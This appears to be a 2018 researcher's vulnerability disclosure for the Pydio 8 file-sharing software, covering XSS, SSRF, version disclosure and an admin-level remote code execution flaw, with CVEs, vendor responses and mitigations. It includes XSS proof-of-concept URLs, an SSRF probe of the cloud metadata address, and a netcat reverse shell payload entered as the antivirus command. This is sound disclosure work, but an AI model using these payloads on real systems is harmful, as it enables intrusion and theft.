Multiple Flaws Uncovered in Pydio 8

Earlier this year I was asked to perform an OWASP ASVS (Application Security Verification Standard) with a colleague on a client's deployment of the web-based file-sharing software Pydio.  After getting my feet wet looking at the codebase, my interest was piqued in the platform and decided to independently research the software for vulnerabilities.

The following vulnerability disclosure is a detailed account of my findings.  Four areas of weakness were identified: multiple XSS flaws, a credentialed SSRF flaw, multiple methods to discover the remote version of the software, and a credentialed Remote Code Execution flaw.  After discussion with the Pydio developers, two of the flaws were fixed in the 8.2.1 release.  The remaining issues were not addressed due to the reasons discussed in the disclosure.  A workaround is included for one of these issues, providing additional protections for those who may require it.

Update October 2018: The vendor has released Pydio 8.2.2, which includes an official fix for the credentialed Remote Code Execution flaw. The disclosure has been updated to reflect the new release.

The following CVE ID's were assigned to the issues: CVE-2018-1999016, CVE-2018-1999017, CVE-2018-1999018

My experience working with the Pydio developers was positive, and I applaud them for responsiveness to the findings.

As with any web application, security can't be achieved only via patching.  Deploying in a hardened server environment that includes protections like sandboxing and employing a tuned Web Application Firewall is essential, so that if 0-day vulnerabilities are found, layers of protections are still facing a would-be attacker.

Direct link to disclosure: Pydio-8-VulnerabilityDisclosure-Jul18.txt

Title : Multiple Flaws Found in Pydio 8
Author: Mike Gualtieri :: https://www.mike-gualtieri.com
Date  : 2018-04-26
Rev 1 : 2018-05-24
Rev 2 : 2018-07-16
Rev 3 : 2018-07-23
Rev 4 : 2018-10-22

Vendor Affected:    Pydio :: https://pydio.com/
Versions Affected:  8.2.0 and prior; 8.2.1 and prior
CVE ID's Assigned:  CVE-2018-1999016, CVE-2018-1999017, CVE-2018-1999018



1. Overview

Multiple remote security issues have been found in Pydio 8, which can aid
an attacker in stealing sensitive data, execute arbitrary code, and utilize
the software as a pivot point for further attack.



2. Detail

Following a recent OWASP ASVS evaluation of Pydio conducted by Aaron Melhorn
of O2 Digital Creative Agency and Mike Gualtieri of Eris Interactive Group,
researcher Mike Gualtieri performed an independent review of the Pydio 8.0.2
codebase.  Multiple flaws were found, detailed below, including:

- XSS flaws in packaged /core/vendor samples
- An authenticated SSRF flaw
- Multiple version disclosure flaws
- An authenticated RCE flaw

Rev 1: With the release of Pydio 8.2.0, this advisory has been updated and tested
with the latest release.  An additional Remote Code Execution issue has been
found and has been added to this revision.

Rev 2: With the release Pydio 8.2.1, this advisory has been updated and tested with
the latest release.  The XSS and SSRF issue have been verified as fixed.

Rev 3: CVE ID's have been assigned for three of the following issues.  The
text has been updated to reflect the assignment.

Rev 4: With the release Pydio 8.2.2, this advisory has been updated and tested with
the latest release.  The authenticated RCE issue in the antivirus plugin has been
verified as fixed.



2a. XSS (Cross Site Scripting) flaws - CVE-2018-1999016

The following sections of code included in the Pydio codebase provide an 
unauthenticated remote attacker a method for XSS by manipulating the PHP_SELF 
parameter.  XSS flaws allow an attacker to manipulate client-side code to
carry out targeted spear-phishing attacks or a method to steal site data 
and/or cookies.


File:       ./core/vendor/meenie/javascript-packer/example-inline.php
Line 48:    

Exploit:    http://pydio.host/core/vendor/meenie/javascript-packer/example-inline.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E%3Cfoo%22

File:       ./core/vendor/dapphp/securimage/examples/test.mysql.static.php
Line 114:   
Exploit:    http://pydio.host/core/vendor/dapphp/securimage/examples/test.mysql.static.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E%3Cfoo%22

File:       ./core/vendor/dapphp/securimage/examples/test.mysql.static.php
Line 118:   
Exploit:    http://pydio.host/core/vendor/dapphp/securimage/examples/test.mysql.static.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E%3Cfoo%22


This flaw can be mitigated in multiple ways:

1) Removal of each file.  This should not impact Pydio as the files are only
included for plugin usage example.

2) Escape the echoed PHP_SELF parameter: 

    htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES, 'UTF-8')

3) Restrict access to the ./core/ directory via an Apache rule.  This must be
done at the global config level for the server and may not be appropriate on
configurations that include multiple vhosts.

    # Restrict Pydio /core/ vendors directory
    
        Order deny,allow
        Deny from all
    

4) Updating to Pydio 8.2.1 will mitigate this flaw.  Release announcement:
https://pydio.com/en/community/releases/pydio-core/pydio-821-security-release



2b. Credentialed SSRF (Server Side Request Forgery) flaw - CVE-2018-1999017

File: plugins/action.updater/UpgradeManager.php
Line 154: getUpgradePath($url)

Authenticated administrative users have access to the Pydio Update Engine,
which allows for arbitrary URLs to be entered in the section Updater
Configuration > Update Site (http://pydio.host/settings/admin/action.updater).
Upon checking for an update of the software, Pydio makes a request to
index.php with the POST parameter get_action = get_upgrade_path.  The
response of this call is the content of the requested URL.  The origin of
this request is the server and not the client browser.

While this flaw requires Pydio administrative access, an attacker once gaining
access to the system, can utilize an SSRF flaw as a pivot point to enumerate
data about the internal network, or as a proxy for additional attack.

For example, if Pydio is hosted via Amazon Web Services, it may be possible
to probe the following URL for additional information about the server:

    http://169.254.169.254/latest/meta-data/.

While the impact of this flaw can be reduced by concealing the output of the
remote call, blind-SSRF attacks would still be possible.

Updating to Pydio 8.2.1 will mitigate this flaw.  For prior releases,
mitigation may be achieved by blocking outgoing HTTP connections via the web
server, but this may have unintended consequences such as blocking Pydio
software updates.

Pydio 8.2.1 release announcement:
https://pydio.com/en/community/releases/pydio-core/pydio-821-security-release



2c. Version Disclosure

Several methods were found that would enable an unauthenticated remote
attacker to determine the version of Pydio.  Attackers may utilize a 
version disclosure flaw to determine vulnerabilities which may exist in the 
software.


The following URL's include the exact Pydio version string:

URL:        http://pydio.host/plugins/editor.ckeditor/res/build/ckeditor/package.json
Line 13:    "/home/user/build/source/pydio-core-8.2.0/plugins/editor.ckeditor"
Line 47:    "_where": "/home/user/build/source/pydio-core-8.2.0/plugins/editor.ckeditor",

URL:        http://pydio.host/plugins/editor.codemirror/res/build/codemirror/package.json
Line 13:    "/home/user/build/source/pydio-core-8.2.0/plugins/editor.codemirror"
Line 47:    "_where": "/home/user/build/source/pydio-core-8.2.0/plugins/editor.codemirror",

The above version strings are also present in Pydio 8.0.2.

To mitigate, these files can be restricted from remote access.  It may be
possible to completely remove them as well, although the impact of this has
not been tested.

--

The following network requests are made upon loading the Pydio login page:

http://pydio.host/plugins/gui.ajax/res/build/pydio.material.min.css?v=8.2.0
http://pydio.host/plugins/core.licence/res/build/pydio.boot.min.js?v=8.2.0
http://pydio.host/plugins/gui.ajax/res/build/pydio.min.js?v=8.2.0
http://pydio.host/plugins/authfront.keystore/apikeypane.css?v=8.2.0
http://pydio.host/plugins/action.share/res/react-share-form.css?v=8.2.0
http://pydio.host/plugins/boot.conf/res/css/installer.css?v=8.2.0

The above version strings are also present in Pydio 8.0.2.

At the time of this writing there is no simple method to prevent the version
parameter from being disclosed as part of these requests.

--

The following JavaScript call can be made to the Pydio API exposing the
version number.  The request can be made via the browser debug console.

        > pydio.Parameters.get("ajxpVersion");
        > "8.2.0"

The above API call is also present in Pydio 8.0.2.

At the time of this writing there is no simple method to prevent the version
parameter from being disclosed as part of this call.


Vendor response: After discussing the version disclosure issue with the
vendor, they indicated that the version number is used in this way to ensure
that JavaScript and related files are up-to-date in the web browser cache.  At
this time it would be difficult to fix.



2d. Credentialed Remote Code Execution via antivirus plugin - CVE-2018-1999018

File: plugins/action.antivirus/AntivirusScanner.php
Line 124: scanNow($nodeObject)

Attackers gaining access to a Pydio administrative account, can gain Remote
Code  Execution on the underlying operating system via the antivirus plugin,
which allows arbitrary shell commands to be entered, executing as the local
user running the web server.

The antivirus command can be set at the following path:
Settings > Available Plugins > Actions > Antivirus > Antivirus Command 

By entering a reverse shell payload (e.g. nc -nv 127.0.0.1 4444 -e /bin/bash)
an interactive shell can be gained running as the local user of the web server.
Additionally, malicious payloads can be uploaded via Pydio and can be executed
in a similar fashion.  For example a malicious payload evil.php can be
uploaded and then run if the path to Pydio can be guessed (e.g. 
php -q /var/www/html/pydio/data/files/evil.php).

One potential mitigation method would be to hardcode the antivirus executable
path in the scanNow() function.  For example, $command on line 123 of 
plugins/action.antivirus/AntivirusScanner.php could be set as
"/usr/bin/clamscan".  To make the fix more flexible, the command string could
be set via a configuration file within the source code, effectively removing
it from the control of application users.


Vendor response: After discussion with the vendor, at this time, the antivirus
plugin will not be modified.  It is the vendor's thought that the Pydio
administrator will often also have direct access to the server.  The antivirus
plugin works in a similar method to other tools within Pydio that ask for
absolute paths, and have been designed to ease administration.

Workaround: As no official fix exists at this time, it is recommended to
comment line 123-124 of plugins/action.antivirus/AntivirusScanner.php and hard
code the executable string.  If the antivirus plugin is not utilized,
specifying an alternative binary, such as /bin/echo will prevent abuse.

    Example:
    #$command = $this->getContextualOption($nodeObject->getContext(), "COMMAND");
    #$command = str_replace('$' . 'FILE', escapeshellarg($this->path), $command);
    $command = "/usr/bin/clamscan --remove ". escapeshellarg($this->path);


October 2018 update: The vendor has released Pydio 8.2.2 which includes an
official fix to the antivirus plugin remote code execution issue.  It is
recommended to update to the latest version.  If this is not possible, the
workaround included above is another option.

Pydio 8.2.2 release announcement:
https://pydio.com/en/community/releases/pydio-core/pydio-core-pydio-enterprise-822-security-release



3. Additional Comments

The above disclosures were submitted to the Distributed Weakness Filing Project,
for inclusion in the Common Vulnerabilities and Exposures (CVE) database.  The
following entries were assigned.

MITRE CVE Entries:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1999016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1999017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1999018

NIST National Vulnerability Database:
https://nvd.nist.gov/vuln/detail/CVE-2018-1999016
https://nvd.nist.gov/vuln/detail/CVE-2018-1999017
https://nvd.nist.gov/vuln/detail/CVE-2018-1999018

This vulnerability disclosure will be updated as new information becomes
available.  



4. Revision History

Original submission based on Pydio 8.0.2: 2018-04-26
Revised submission based on Pydio 8.2.0:  2018-05-24
Vendor contact made: 2018-05-25 (original submission had not been received)
Revised submission based on Pydio 8.2.1 release: 2018-07-16
Revised submission based on CVE ID assignment: 2018-07-23
Vendor has released the Pydio 8.2.2 security update: 2018-10-11
Revised submission based on Pydio 8.2.2 update: 2018-10-22

Updated: Oct 22, 2018

Posted: Jul 23, 2018